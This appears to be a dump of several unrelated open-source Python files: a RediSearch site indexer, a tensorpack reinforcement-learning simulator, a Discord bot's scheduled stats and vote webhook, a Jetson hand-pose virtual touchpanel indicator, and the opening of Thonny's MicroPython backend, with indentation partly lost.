At query time, RediSearch will multiply the ad-hoc score by the TF*IDF
score of a document to produce the final score.
"""
score = 1.0
for scorer in self.site.scorers:
score = scorer(document, score)
doc = asdict(document)
doc['__score'] = score
hierarchy = self.build_hierarchy(document)
doc['hierarchy'] = json.dumps(hierarchy)
return doc
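    # For illustration, a scorer is just a callable like this hypothetical
    # example; each scorer receives the document and the running score and
    # returns the adjusted score:
    #
    #     def boost_sections(doc: SearchDocument, score: float) -> float:
    #         return score * 1.2 if doc.type == TYPE_SECTION else score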
def index_document(self, doc: SearchDocument):
"""
Add a document to the search index.
This is the moment we convert a SearchDocument into a Python
dictionary and send it to RediSearch.
"""
key = self.keys.document(self.site.url, doc.doc_id)
try:
self.redis.hset(key, mapping=self.document_to_dict(doc))
except redis.exceptions.DataError as e:
log.error("Failed -- bad data: %s, %s", e, doc.url)
except redis.exceptions.ResponseError as e:
log.error("Failed -- response error: %s, %s", e, doc.url)
new_urls_key = self.keys.site_urls_new(self.index_alias)
self.redis.sadd(new_urls_key, doc.url)
    def add_synonyms(self):
        # Register every synonym group with RediSearch.
        for synonym_group in self.site.synonym_groups:
            self.redis.execute_command(SYNUPDATE_COMMAND,
                                       self.index_name,
                                       synonym_group.group_id,
                                       *synonym_group.synonyms)
def search_index_exists(self):
try:
self.search_client.info()
except redis.exceptions.ResponseError:
return False
else:
return True
def setup_index(self):
"""
Create the index definition and schema.
If the indexer was given any synonym groups, it adds these
to RediSearch after creating the index.
"""
definition = IndexDefinition(prefix=[self.keys.index_prefix(self.url)])
self.search_client.create_index(self.site.search_schema,
definition=definition)
if self.site.synonym_groups:
self.add_synonyms()
def debounce(self):
last_index = self.redis.get(self.keys.last_index(self.site.url))
if last_index:
now = datetime.datetime.now().timestamp()
time_diff = now - float(last_index)
            # Debounce: skip this run if the previous indexing run was too recent.
            if time_diff < DEBOUNCE_SECONDS:
raise DebounceError(f"Debounced indexing after {time_diff}s")
def clear_old_indexes(self):
old_indexes = [
i for i in self.redis.execute_command('FT._LIST')
if i.startswith(self.index_alias) and i != self.index_name
]
log.debug("Dropping old indexes: %s", ", ".join(old_indexes))
for idx in old_indexes:
self.redis.execute_command('FT.DROPINDEX', idx)
def clear_old_hashes(self):
"""
Delete any stale Hashes from the index.
Stale Hashes are those whose document IDs exist in the search index but
not in the latest set of seen IDs after scraping a site.
Every document ID includes both the URL of the page it came from and a
hash of the page's or section's content. When the content of a page or
section we're tracking in the index changes on the site, we'll get a new
document ID. Because the ID will differ from the one we've already seen,
the old document will show up as stale, and we can delete it.
"""
all_hash_ids = set()
offset = 0
iter_by = 200
# Get the set of all Hash IDs that this index knows about.
while True:
q = Query("*").paging(offset, iter_by).return_fields("doc_id")
existing_docs = self.search_client.search(q).docs
if not existing_docs: # No more documents
break
all_hash_ids |= {getattr(d, 'doc_id', None) for d in existing_docs}
offset += iter_by
stale_ids = all_hash_ids - self.seen_ids
stale_ids.discard(None)
log.warning("Deleting stale IDs: %s", stale_ids)
# Remove the stale Hashes.
if stale_ids:
keys = [self.keys.document(self.url, id) for id in stale_ids]
self.redis.delete(*keys)
def create_index_alias(self):
"""
Switch the current alias to point to the new index and delete old indexes.
If the alias doesn't exist yet, this method will create it.
"""
try:
self.search_client.aliasupdate(self.index_alias)
except ResponseError:
log.error("Alias %s for index %s did not exist, creating.",
self.index_alias, self.index_name)
self.search_client.aliasadd(self.index_alias)
self.clear_old_indexes()
def build_hierarchy(self, doc: SearchDocument):
"""
Build the hierarchy of pages "above" this document.
At this point, we've already crawled all the URLs that we're going to
index, and we added the URLs and page titles to the `seen_urls`
dictionary.
Now, for this document, we're going to walk through the parts of its
URL and reconstruct the page titles for those pages. We don't need
the root page title of the site, so we leave that out of the
hierarchy.
So, for example, if we're indexing the site https://docs.redislabs.com/latest
and we have a document whose URL is:
https://docs.redislabs.com/latest/ri/using-redisinsight/cluster-management/
We're going to look up the titles of the following URLs:
https://docs.redislabs.com/latest/ri
https://docs.redislabs.com/latest/ri/using-redisinsight
And we'll come up with the following hierarchy:
["RedisInsight", "Using RedisInsight", "Cluster Management"]
Because URLs might contain trailing slashes, and we might have a mix
of URLs with and without trailing slashes, we always remove the
trailing slash when we add a URL to `seen_urls` and then we remove
any trailing slashes again when we look up a URL.
"""
hierarchy = []
url = doc.url.replace(self.site.url, "").replace("//", "/").strip("/")
parts = url.split("/")
joinable_site_url = self.site.url.rstrip("/")
for i, part in enumerate(parts):
path_url = "/".join([joinable_site_url, *parts[:i], part])
page = self.seen_urls.get(path_url)
if page:
hierarchy.append(page)
if not hierarchy:
log.debug('URL lacks hierarchy: %s', url)
return hierarchy
def index(self, force: bool = False):
if not force:
try:
self.debounce()
except DebounceError as e:
log.error("Debounced indexing task: %s", e)
return
if self.redis.exists(self.lock):
log.info("Skipping index due to presence of lock %s", self.lock)
return
# Set a lock per URL while indexing.
self.redis.set(self.lock, 1, ex=INDEXING_LOCK_TIMEOUT)
docs_to_process = Queue()
Spider = type(
'Spider', (DocumentationSpiderBase, ), {"site_config": self.site})
def enqueue_document(signal, sender, item: SearchDocument, response,
spider):
"""Queue a SearchDocument for indexation."""
url_without_slash = item.url.rstrip("/")
# Don't index the root page. There is probably a better way to
# do this with Scrapy!
if url_without_slash == self.site.url.rstrip("/"):
return
            # Remove double slashes from the title -- we don't want escape
            # characters in the hierarchy JSON because json.loads() can't parse them.
self.seen_urls[url_without_slash] = item.title.replace("//", "")
self.seen_ids |= {item.doc_id}
docs_to_process.put(item)
def index_documents():
while True:
doc: SearchDocument = docs_to_process.get()
try:
self.index_document(doc)
except Exception as e:
log.error(
"Unexpected error while indexing doc %s, error: %s",
doc.doc_id, e)
docs_to_process.task_done()
def start_indexing():
if docs_to_process.empty():
# Don't keep around an empty search index.
self.redis.execute_command('FT.DROPINDEX', self.index_name)
return
for _ in range(MAX_THREADS):
Thread(target=index_documents, daemon=True).start()
self.redis.set(self.keys.last_index(self.site.url),
datetime.datetime.now().timestamp())
docs_to_process.join()
self.create_index_alias()
self.clear_old_hashes()
self.redis.delete(self.lock)
dispatcher.connect(enqueue_document, signal=signals.item_scraped)
dispatcher.connect(start_indexing, signal=signals.engine_stopped)
process = CrawlerProcess(
settings={
'CONCURRENT_ITEMS': 200,
'CONCURRENT_REQUESTS': 100,
'CONCURRENT_REQUESTS_PER_DOMAIN': 100,
'HTTP_CACHE_ENABLED': True,
'REACTOR_THREADPOOL_MAXSIZE': 30,
'LOG_LEVEL': 'ERROR'
})
log.info("Started crawling")
process.crawl(Spider)
process.start()
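# The function below is not part of the indexer; it is a minimal, standalone
# sketch of the lookup that build_hierarchy() performs, using the example URLs
# from its docstring. The contents of `seen_urls` here are hypothetical.
def _hierarchy_sketch():
    site_url = "https://docs.redislabs.com/latest"
    seen_urls = {
        "https://docs.redislabs.com/latest/ri": "RedisInsight",
        "https://docs.redislabs.com/latest/ri/using-redisinsight": "Using RedisInsight",
        "https://docs.redislabs.com/latest/ri/using-redisinsight/cluster-management": "Cluster Management",
    }
    doc_url = "https://docs.redislabs.com/latest/ri/using-redisinsight/cluster-management/"
    # Same normalization as build_hierarchy(): strip the site prefix and the
    # trailing slash, then rebuild each ancestor URL part by part.
    parts = doc_url.replace(site_url, "").replace("//", "/").strip("/").split("/")
    hierarchy = []
    for i, part in enumerate(parts):
        path_url = "/".join([site_url.rstrip("/"), *parts[:i], part])
        title = seen_urls.get(path_url)
        if title:
            hierarchy.append(title)
    assert hierarchy == ["RedisInsight", "Using RedisInsight", "Cluster Management"]
    return hierarchy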
|
simulator.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: simulator.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import tensorflow as tf
import multiprocessing as mp
import time
import os
import threading
from abc import abstractmethod, ABCMeta
from collections import defaultdict
import six
from six.moves import queue
import zmq
from tensorpack.models.common import disable_layer_logging
from tensorpack.callbacks import Callback
from tensorpack.tfutils.varmanip import SessionUpdate
from tensorpack.predict import OfflinePredictor
from tensorpack.utils import logger
from tensorpack.utils.serialize import loads, dumps
from tensorpack.utils.concurrency import LoopThread, ensure_proc_terminate
__all__ = ['SimulatorProcess', 'SimulatorMaster',
'SimulatorProcessStateExchange',
'TransitionExperience']
class TransitionExperience(object):
""" A transition of state, or experience"""
def __init__(self, state, action, reward, **kwargs):
""" kwargs: whatever other attribute you want to save"""
self.state = state
self.action = action
self.reward = reward
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
@six.add_metaclass(ABCMeta)
class SimulatorProcessBase(mp.Process):
def __init__(self, idx):
super(SimulatorProcessBase, self).__init__()
self.idx = int(idx)
self.name = u'simulator-{}'.format(self.idx)
self.identity = self.name.encode('utf-8')
@abstractmethod
def _build_player(self):
pass
class SimulatorProcessStateExchange(SimulatorProcessBase):
"""
    A process that simulates a player and communicates with the master to
    send states and receive the next action.
"""
def __init__(self, idx, pipe_c2s, pipe_s2c):
"""
:param idx: idx of this process
"""
super(SimulatorProcessStateExchange, self).__init__(idx)
self.c2s = pipe_c2s
self.s2c = pipe_s2c
def run(self):
player = self._build_player()
context = zmq.Context()
c2s_socket = context.socket(zmq.PUSH)
c2s_socket.setsockopt(zmq.IDENTITY, self.identity)
c2s_socket.set_hwm(2)
c2s_socket.connect(self.c2s)
s2c_socket = context.socket(zmq.DEALER)
s2c_socket.setsockopt(zmq.IDENTITY, self.identity)
# s2c_socket.set_hwm(5)
s2c_socket.connect(self.s2c)
state = player.current_state()
reward, isOver = 0, False
while True:
c2s_socket.send(dumps(
(self.identity, state, reward, isOver)),
copy=False)
action = loads(s2c_socket.recv(copy=False).bytes)
reward, isOver = player.action(action)
state = player.current_state()
# compatibility
SimulatorProcess = SimulatorProcessStateExchange
class SimulatorMaster(threading.Thread):
""" A base thread to communicate with all StateExchangeSimulatorProcess.
It should produce action for each simulator, as well as
defining callbacks when a transition or an episode is finished.
"""
class ClientState(object):
def __init__(self):
self.memory = [] # list of Experience
def __init__(self, pipe_c2s, pipe_s2c):
super(SimulatorMaster, self).__init__()
assert os.name != 'nt', "Doesn't support windows!"
self.daemon = True
self.name = 'SimulatorMaster'
self.context = zmq.Context()
self.c2s_socket = self.context.socket(zmq.PULL)
self.c2s_socket.bind(pipe_c2s)
self.c2s_socket.set_hwm(10)
self.s2c_socket = self.context.socket(zmq.ROUTER)
self.s2c_socket.bind(pipe_s2c)
self.s2c_socket.set_hwm(10)
# queueing messages to client
self.send_queue = queue.Queue(maxsize=100)
def f():
msg = self.send_queue.get()
self.s2c_socket.send_multipart(msg, copy=False)
self.send_thread = LoopThread(f)
self.send_thread.daemon = True
self.send_thread.start()
# make sure socket get closed at the end
def clean_context(soks, context):
for s in soks:
s.close()
context.term()
import atexit
atexit.register(clean_context, [self.c2s_socket, self.s2c_socket], self.context)
def run(self):
self.clients = defaultdict(self.ClientState)
try:
while True:
msg = loads(self.c2s_socket.recv(copy=False).bytes)
ident, state, reward, isOver = msg
# TODO check history and warn about dead client
client = self.clients[ident]
# check if reward&isOver is valid
# in the first message, only state is valid
if len(client.memory) > 0:
client.memory[-1].reward = reward
if isOver:
self._on_episode_over(ident)
else:
self._on_datapoint(ident)
# feed state and return action
self._on_state(state, ident)
except zmq.ContextTerminated:
logger.info("[Simulator] Context was terminated.")
@abstractmethod
def _on_state(self, state, ident):
"""response to state sent by ident. Preferrably an async call"""
@abstractmethod
def _on_episode_over(self, client):
""" callback when the client just finished an episode.
You may want to clear the client's memory in this callback.
"""
def _on_datapoint(self, client):
""" callback when the client just finished a transition
"""
def __del__(self):
self.context.destroy(linger=0)
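# A minimal sketch (not part of this module) of how a concrete SimulatorMaster
# could answer its clients: _on_state picks an action and puts an
# [identity, serialized action] pair on send_queue; the send thread then
# forwards it through the ROUTER socket to the DEALER client with that
# identity. The trivial policy below is a placeholder.
class _EchoActionMaster(SimulatorMaster):
    def _on_state(self, state, ident):
        action = 0  # placeholder policy; a real master would query a predictor
        self.send_queue.put([ident, dumps(action)])

    def _on_episode_over(self, ident):
        self.clients[ident].memory = []

    def _on_datapoint(self, ident):
        pass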
# ------------------- the following code is not used at all. Just experimental.
class SimulatorProcessDF(SimulatorProcessBase):
""" A simulator which contains a forward model itself, allowing
it to produce data points directly """
def __init__(self, idx, pipe_c2s):
super(SimulatorProcessDF, self).__init__(idx)
self.pipe_c2s = pipe_c2s
def run(self):
self.player = self._build_player()
self.ctx = zmq.Context()
self.c2s_socket = self.ctx.socket(zmq.PUSH)
self.c2s_socket.setsockopt(zmq.IDENTITY, self.identity)
self.c2s_socket.set_hwm(5)
self.c2s_socket.connect(self.pipe_c2s)
self._prepare()
for dp in self.get_data():
self.c2s_socket.send(dumps(dp), copy=False)
@abstractmethod
def _prepare(self):
pass
@abstractmethod
def get_data(self):
pass
class SimulatorProcessSharedWeight(SimulatorProcessDF):
""" A simulator process with an extra thread waiting for event,
and take shared weight from shm.
Start me under some CUDA_VISIBLE_DEVICES set!
"""
def __init__(self, idx, pipe_c2s, condvar, shared_dic, pred_config):
super(SimulatorProcessSharedWeight, self).__init__(idx, pipe_c2s)
self.condvar = condvar
self.shared_dic = shared_dic
self.pred_config = pred_config
def _prepare(self):
disable_layer_logging()
self.predictor = OfflinePredictor(self.pred_config)
with self.predictor.graph.as_default():
vars_to_update = self._params_to_update()
self.sess_updater = SessionUpdate(
self.predictor.session, vars_to_update)
# TODO setup callback for explore?
self.predictor.graph.finalize()
self.weight_lock = threading.Lock()
# start a thread to wait for notification
def func():
self.condvar.acquire()
while True:
self.condvar.wait()
self._trigger_evt()
self.evt_th = threading.Thread(target=func)
self.evt_th.daemon = True
self.evt_th.start()
def _trigger_evt(self):
with self.weight_lock:
self.sess_updater.update(self.shared_dic['params'])
logger.info("Updated.")
def _params_to_update(self):
# can be overwritten to update more params
return tf.trainable_variables()
class WeightSync(Callback):
""" Sync weight from main process to shared_dic and notify"""
def __init__(self, condvar, shared_dic):
self.condvar = condvar
self.shared_dic = shared_dic
def _setup_graph(self):
self.vars = self._params_to_update()
def _params_to_update(self):
# can be overwritten to update more params
return tf.trainable_variables()
def _before_train(self):
self._sync()
def _trigger_epoch(self):
self._sync()
def _sync(self):
logger.info("Updating weights ...")
dic = {v.name: v.eval() for v in self.vars}
self.shared_dic['params'] = dic
self.condvar.acquire()
self.condvar.notify_all()
self.condvar.release()
if __name__ == '__main__':
import random
from tensorpack.RL import NaiveRLEnvironment
class NaiveSimulator(SimulatorProcess):
def _build_player(self):
return NaiveRLEnvironment()
class NaiveActioner(SimulatorMaster):
def _get_action(self, state):
time.sleep(1)
return random.randint(1, 12)
def _on_episode_over(self, client):
# print("Over: ", client.memory)
client.memory = []
client.state = 0
    # both a c2s and an s2c pipe are needed by the constructors above
    name_c2s = 'ipc://whatever-c2s'
    name_s2c = 'ipc://whatever-s2c'
    procs = [NaiveSimulator(k, name_c2s, name_s2c) for k in range(10)]
    [k.start() for k in procs]
    th = NaiveActioner(name_c2s, name_s2c)
ensure_proc_terminate(procs)
th.start()
time.sleep(100)
|
ready_loop.py
|
# Called when the bot is ready to be used
import asyncio
import datetime
import sqlite3
import threading
import time
import discord
import flask
from Data.Constants.import_const import Login, Ids, Main_bot, Useful
from Script.import_emojis import Emojis
if Main_bot:
discord_token = Login["discord"]["token"]
else:
discord_token = Login["discord"]["beta"]
async def ready_loop(self):
support_server = self.get_guild(Ids["Support_server"])
member_role = discord.utils.get(support_server.roles, name="Member")
for member in support_server.members:
if (member_role not in member.roles) and (not member.bot):
await member.add_roles(member_role)
if Main_bot:
status_channel = self.get_channel(Ids["Status_channel"])
msg = await status_channel.send(f"{Emojis['Yes']} Connected")
await msg.edit(content=f"{Emojis['Yes']} Connected `{msg.created_at.replace(microsecond=0).isoformat(sep=' ')}` UTC-0")
clash_info = self
def thread_weekly_stats():
while True:
date = datetime.datetime.now()
monday = datetime.date.today() + datetime.timedelta(days=(7 - date.weekday()))
monday = datetime.datetime(monday.year, monday.month, monday.day)
diff = monday - date
time.sleep(diff.seconds + diff.days * 24 * 3600)
print("Weekly Stats", datetime.datetime.now())
# ===== WEEKLY STATS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class WeeklyStatsBot(discord.Client):
def __init__(self):
super().__init__()
async def on_ready(self):
channel = self.get_channel(Ids["Weekly_stats_channel"])
old_servers_count = 0
async for message in channel.history(limit=None):
if message.is_system():
await message.delete()
if message.pinned:
old_servers_count = int(message.content)
await message.delete()
break
msg = await channel.send(str(len(clash_info.guilds)))
await msg.pin()
diff_servers_count = len(clash_info.guilds) - old_servers_count
diff_servers_count = "%+d" % diff_servers_count
await channel.send(f"Evolution of number of servers this week : {diff_servers_count}")
await self.logout()
weekly_stats_bot = WeeklyStatsBot()
try:
loop.run_until_complete(weekly_stats_bot.start(discord_token))
except KeyboardInterrupt:
loop.run_until_complete(weekly_stats_bot.close())
finally:
loop.close()
thread = threading.Thread(target=thread_weekly_stats)
thread.start()
def thread_monthly_users():
while True:
date = datetime.datetime.now()
if date.month < 12:
day1 = datetime.datetime(date.year, date.month + 1, 1)
else:
day1 = datetime.datetime(date.year + 1, 1, 1)
diff = day1 - date
time.sleep(diff.seconds + diff.days * 24 * 3600 + 3600) # 1h00 instead of 0h00 to avoid conflicts with WeeklyStats
print("Monthly Users Stats", datetime.datetime.now())
# ===== MONTHLY USERS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class MonthlyUsersBot(discord.Client):
def __init__(self):
super().__init__()
async def on_ready(self):
connection = sqlite3.connect(Useful["secure_folder_path"] + "Modifiable.sqlite")
cursor = connection.cursor()
cursor.execute("SELECT COUNT(*) FROM BotUsage")
nb_monthly_users = cursor.fetchone()[0]
text = f"Monthly users : {nb_monthly_users}"
channel = self.get_channel(Ids["Monthly_stats_channel"])
await channel.send(text)
if len(str(date.month)) == 1:
month = f"0{date.month}"
else:
month = str(date.month)
w = f"""CREATE TABLE IF NOT EXISTS BotUsage_{date.year}_{month} AS SELECT * FROM BotUsage"""
cursor.execute(w)
cursor.execute("DELETE FROM BotUsage")
connection.commit()
await self.logout()
monthly_users_bot = MonthlyUsersBot()
try:
loop.run_until_complete(monthly_users_bot.start(discord_token))
except KeyboardInterrupt:
loop.run_until_complete(monthly_users_bot.close())
finally:
loop.close()
thread = threading.Thread(target=thread_monthly_users)
thread.start()
def thread_webhooks_app():
app = flask.Flask(__name__)
@app.route('/topgg_webhook', methods=['post'])
def topgg_webhook():
if (flask.request.remote_addr != "159.203.105.187") or ("Authorization" not in list(flask.request.headers.keys())) or (flask.request.headers["Authorization"] != Login["topgg"]["authorization"]):
authorization = None if "Authorization" not in list(flask.request.headers.keys()) else flask.request.headers["Authorization"]
print(f"Unauthorized :\nIP = {flask.request.remote_addr}\nAuthorization = {authorization}")
return flask.Response(status=401)
def run_bot(voter_id):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class WebhooksBot(discord.Client):
def __init__(self):
super().__init__()
async def on_ready(self):
import json
from Script.import_functions import create_embed
from Data.Constants.useful import Useful
from Data.Variables.import_var import Votes
user = clash_info.get_user(voter_id)
votes_channel = self.get_channel(Ids["Votes_channel"])
if user.id not in list(Votes.keys()):
Votes[user.id] = 1
else:
Votes[user.id] += 1
json_text = json.dumps(Votes, sort_keys=True, indent=4)
def_votes = open(f"{Useful['secure_folder_path']}votes.json", "w")
def_votes.write(json_text)
def_votes.close()
vote_copy = dict(Votes)
vote = {}
for member_id, member_votes in vote_copy.items():
member = clash_info.get_user(int(member_id))
vote[member.mention] = member_votes
vote = sorted(vote.items(), key=lambda t: t[1])
text = ""
for user_vote_tuple in vote:
text += f"{user_vote_tuple[0]} has voted {user_vote_tuple[1]} times\n"
embed = create_embed(f"{user} has voted for Clash INFO", text, votes_channel.guild.me.color, "", votes_channel.guild.me.avatar_url)
await votes_channel.send(embed=embed)
await self.logout()
webhooks_bot = WebhooksBot()
try:
loop.run_until_complete(webhooks_bot.start(discord_token))
except KeyboardInterrupt:
loop.run_until_complete(webhooks_bot.close())
finally:
loop.close()
import threading
thread = threading.Thread(target=run_bot, kwargs={"voter_id": int(flask.request.get_json()["user"])})
thread.start()
return flask.Response(status=200)
app.run(host="0.0.0.0", port=8080)
thread = threading.Thread(target=thread_webhooks_app, args=())
thread.start()
print("Connected")
nb_guilds = len(self.guilds)
    act = discord.Activity(type=discord.ActivityType.watching, name=f"{nb_guilds:,} servers")
await self.change_presence(status=discord.Status.online, activity=act)
return
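# Standalone sketch (not used by the bot) of the "sleep until next Monday
# 00:00" computation that thread_weekly_stats performs above.
def seconds_until_next_monday(now: datetime.datetime) -> int:
    next_monday = datetime.date(now.year, now.month, now.day) + datetime.timedelta(days=(7 - now.weekday()))
    midnight = datetime.datetime(next_monday.year, next_monday.month, next_monday.day)
    diff = midnight - now
    return diff.days * 24 * 3600 + diff.seconds
# e.g. seconds_until_next_monday(datetime.datetime(2021, 1, 1, 12, 0)) == 216000  (2.5 days)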
|
vtouch_indicator.py
|
# Copyright (c) 2020-2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import gi
import subprocess
import time
import threading
import re
import sys
import multiprocessing as mp
import zmq
import vtouch as vt
zmq_host = "127.0.0.1"
zmq_port = "5001"
gi.require_version("Gtk", "3.0")
gi.require_version('AppIndicator3', '0.1')
gi.require_version('Notify', '0.7')
from gi.repository import Gtk as gtk
from gi.repository import AppIndicator3 as appindicator
from gi.repository import Notify as notify
from gi.repository import GObject
INDICATOR_ID = 'vtouchindicator'
SELF_DIR = os.path.dirname(os.path.abspath(__file__))
ICON_DEFAULT = os.path.join(SELF_DIR, 'assets/icons/icon_vtouch.svg')
evt_queue = mp.Queue()
last_timestamp = mp.Value('d', time.time())
framerate = mp.Value('i', 0)
def about(self):
dialog = gtk.MessageDialog(
transient_for=None,
flags=0,
message_type=gtk.MessageType.INFO,
buttons=gtk.ButtonsType.OK,
text="Jetson Virtual Touchpanel",
)
dialog.format_secondary_text(
"This tool uses a camera to detect users' handpose to control the system mouse cursor. \
\nIt is primarily designed for interactive signage systems, freeing users from physically touching a mouse or a touchpanel. \
\n \
\nhttps://github.com/NVIDIA-AI-IOT/jetson_virtual_touchpanel"
)
dialog.run()
print("INFO dialog closed")
dialog.destroy()
def start(_):
import getpass
USER = getpass.getuser()
cmd = ("x-terminal-emulator --title='handpose-camera service' -e \
/home/" + str(USER) + "/jetson-pose-container/run.sh \
--run python3 ./_host_home/jetson_virtual_touchpanel/pub/trtpose_handpose/pub_hand_msg_thread.py \
").split()
subprocess.call(cmd)
def stop(_):
#cmd = "docker ps -a -q --filter ancestor=jetson-pose"
cmd = "docker ps | grep 'jetson-pose' | awk '{print $1}'"
container_id = subprocess.check_output(cmd, shell=True).decode("utf-8")
print(container_id)
cmd = "docker stop " + container_id
subprocess.call(cmd.split())
def quit(_):
running.clear()
proc_subscriber.terminate()
evt_queue.put(None)
gtk.main_quit()
def build_menu():
menu = gtk.Menu()
item_about = gtk.MenuItem('About Virtual Touchpanel ...')
item_about.connect('activate', about)
menu.append(item_about)
menu.append(gtk.SeparatorMenuItem())
item_start = gtk.MenuItem('Start camera-pose service')
item_start.connect('activate', start)
menu.append(item_start)
item_stop = gtk.MenuItem('Stop camera-pose service')
item_stop.connect('activate', stop)
menu.append(item_stop)
menu.append(gtk.SeparatorMenuItem())
item_quit = gtk.MenuItem('Quit')
item_quit.connect('activate', quit)
menu.append(item_quit)
menu.show_all()
return menu
def mess_callback():
pass
def trtpose_subscriber(running, last_timestamp, framerate):
print("--- Subscriber thread ---")
    frame_number = 0  # number of messages received in the last 1-second interval
# Creates a socket instance
context = zmq.Context()
socket = context.socket(zmq.SUB)
# Connects to a bound socket
socket.connect("tcp://{}:{}".format(zmq_host, zmq_port))
# Subscribes to all topics
socket.subscribe("")
last_gesture = ""
curr_gesture = ""
while True:
# Receives a string format message
msg = socket.recv_json()
cur_timestamp = time.time()
curr_gesture = msg['gesture']
x = msg['objects'][0]['keypoints'][5]['x']
y = msg['objects'][0]['keypoints'][5]['y']
#print("[" + str(x) + "," + str(y) + "] (received at " + str(cur_timestamp) + ")")
if (x != 0 or y != 0):
model.set_mouse_coord((224-x)/224 * 1920, y/224 * 1080)
        if last_gesture == "point" and curr_gesture == "click":
            print(" ===========> trigger_mouse_click")
            model.trigger_mouse_click(1)
last_gesture = curr_gesture
        if cur_timestamp % 1.0 < last_timestamp.value % 1.0:
            # store the per-second message rate in the shared value
            framerate.value = frame_number
            print("framerate = " + str(framerate.value))
            frame_number = 0
        else:
            frame_number += 1
last_timestamp.value = cur_timestamp
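# Standalone sketch (not used by the indicator) of the coordinate mapping done
# in the subscriber loop above: a keypoint in the 224x224 camera frame is
# mirrored horizontally and scaled to the 1920x1080 screen, matching the
# hard-coded sizes used above.
def map_keypoint_to_screen(x, y, frame_size=224, screen_w=1920, screen_h=1080):
    screen_x = (frame_size - x) / frame_size * screen_w  # mirror left/right
    screen_y = y / frame_size * screen_h
    return screen_x, screen_y
# e.g. map_keypoint_to_screen(112, 112) -> (960.0, 540.0), the centre of the screen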
def trtpose_monitor(running, last_timestamp):
print("--- Monitor process ---")
trtpose_active = False
while running.is_set():
cur_timestamp = time.time()
#print("cur: " + str(cur_timestamp) + ", last_timestamp: " + str(last_timestamp.value))
if cur_timestamp - last_timestamp.value > 0.5:
if trtpose_active == True:
print("trt_pose stopped")
trtpose_active = False
else:
if trtpose_active == False:
print("trt_pose started")
trtpose_active = True
update_icon(trtpose_active)
do_notify(trtpose_active)
time.sleep(0.5)
def check_trtpose_activity():
threading.Timer(1.0, check_trtpose_activity).start()
print("Hello, World!" + str(time.time()))
def update_icon(status):
if(status):
indicator.set_icon(os.path.join(SELF_DIR, 'assets/icons/icon_vtouch.svg'))
else:
indicator.set_icon(os.path.join(SELF_DIR, 'assets/icons/icon_vtouch_inactive.svg'))
def do_notify(status):
msg_lines = []
if(status):
msg_lines.append(f"Service 'handpose-camera' started")
else:
msg_lines.append(f"Service 'handpose-camera' stopped")
msg = '\n'.join(msg_lines)
notification.update(msg)
notification.set_timeout(1000) #milliseconds
notification.set_urgency(0)
notification.show()
model = vt.vtouch()
indicator = appindicator.Indicator.new(INDICATOR_ID, ICON_DEFAULT, appindicator.IndicatorCategory.SYSTEM_SERVICES)
indicator.set_status(appindicator.IndicatorStatus.ACTIVE)
indicator.set_menu(build_menu())
notify.init(INDICATOR_ID)
notification = notify.Notification()
running = threading.Event()
running.set()
proc_subscriber = mp.Process(target=trtpose_subscriber, args=(running, last_timestamp, framerate))
proc_subscriber.start()
thrd_monitor = threading.Thread(target=trtpose_monitor, args=(running, last_timestamp))
thrd_monitor.start()
gtk.main()
|
backend.py
|
from thonny.common import (
InputSubmission,
InterruptCommand,
EOFCommand,
parse_message,
ToplevelCommand,
ToplevelResponse,
InlineCommand,
InlineResponse,
UserError,
serialize_message,
BackendEvent,
ValueInfo,
execute_system_command,
)
import sys
import logging
import traceback
import queue
from thonny.plugins.micropython.connection import (
ConnectionClosedException,
ConnectionFailedException,
)
from textwrap import dedent
import ast
import re
from queue import Queue, Empty
import threading
import os
import time
from thonny.misc_utils import find_volumes_by_name, sizeof_fmt
import jedi
import io
import tokenize
from thonny.running import EXPECTED_TERMINATION_CODE
import binascii
import shutil
from threading import Lock
# See https://github.com/dhylands/rshell/blob/master/rshell/main.py
# for UART_BUFFER_SIZE vs USB_BUFFER_SIZE
# ampy uses 32 bytes: https://github.com/pycampers/ampy/blob/master/ampy/files.py
# I'm not worrying so much, because the reader thread reads continuously
# and the writer (SerialConnection) has its own blocks and delays
BUFFER_SIZE = 512
BAUDRATE = 115200
ENCODING = "utf-8"
# Commands
RAW_MODE_CMD = b"\x01"
NORMAL_MODE_CMD = b"\x02"
INTERRUPT_CMD = b"\x03"
SOFT_REBOOT_CMD = b"\x04"
# Output tokens
VALUE_REPR_START = b"<repr>"
VALUE_REPR_END = b"</repr>"
STX = b"\x02"
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
LF = b"\n"
OK = b"OK"
# first prompt when switching to raw mode (or after soft reboot in raw mode)
# Looks like it's not translatable in CP
# https://github.com/adafruit/circuitpython/blob/master/locale/circuitpython.pot
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
FIRST_RAW_PROMPT_SUFFIX = b"\r\n>"
RAW_PROMPT = b">"
# How many seconds to wait for something that should appear quickly.
# In other words -- how long to wait with reporting a protocol error
# (hoping that the required piece is still coming)
WAIT_OR_CRASH_TIMEOUT = 3
SECONDS_IN_YEAR = 60 * 60 * 24 * 365
FALLBACK_BUILTIN_MODULES = [
"cmath",
"gc",
"math",
"sys",
"array",
# "binascii", # don't include it, as it may give false signal for reader/writer
"collections",
"errno",
"hashlib",
"heapq",
"io",
"json",
"os",
"re",
"select",
"socket",
"ssl",
"struct",
"time",
"zlib",
"_thread",
"btree",
"framebuf",
"machine",
"micropython",
"network",
"bluetooth",
"cryptolib",
"ctypes",
"pyb",
"esp",
"esp32",
]
logger = logging.getLogger("thonny.micropython.backend")
def debug(msg):
    # Debug output is disabled; remove the early return to re-enable it.
    return
    print(msg, file=sys.stderr)
class MicroPythonBackend:
def __init__(self, connection, clean, api_stubs_path):
self._connection = connection
self._local_cwd = None
self._cwd = None
self._command_queue = Queue() # populated by reader thread
self._progress_times = {}
self._api_stubs_path = api_stubs_path
self._command_reading_thread = threading.Thread(target=self._read_commands, daemon=True)
self._command_reading_thread.start()
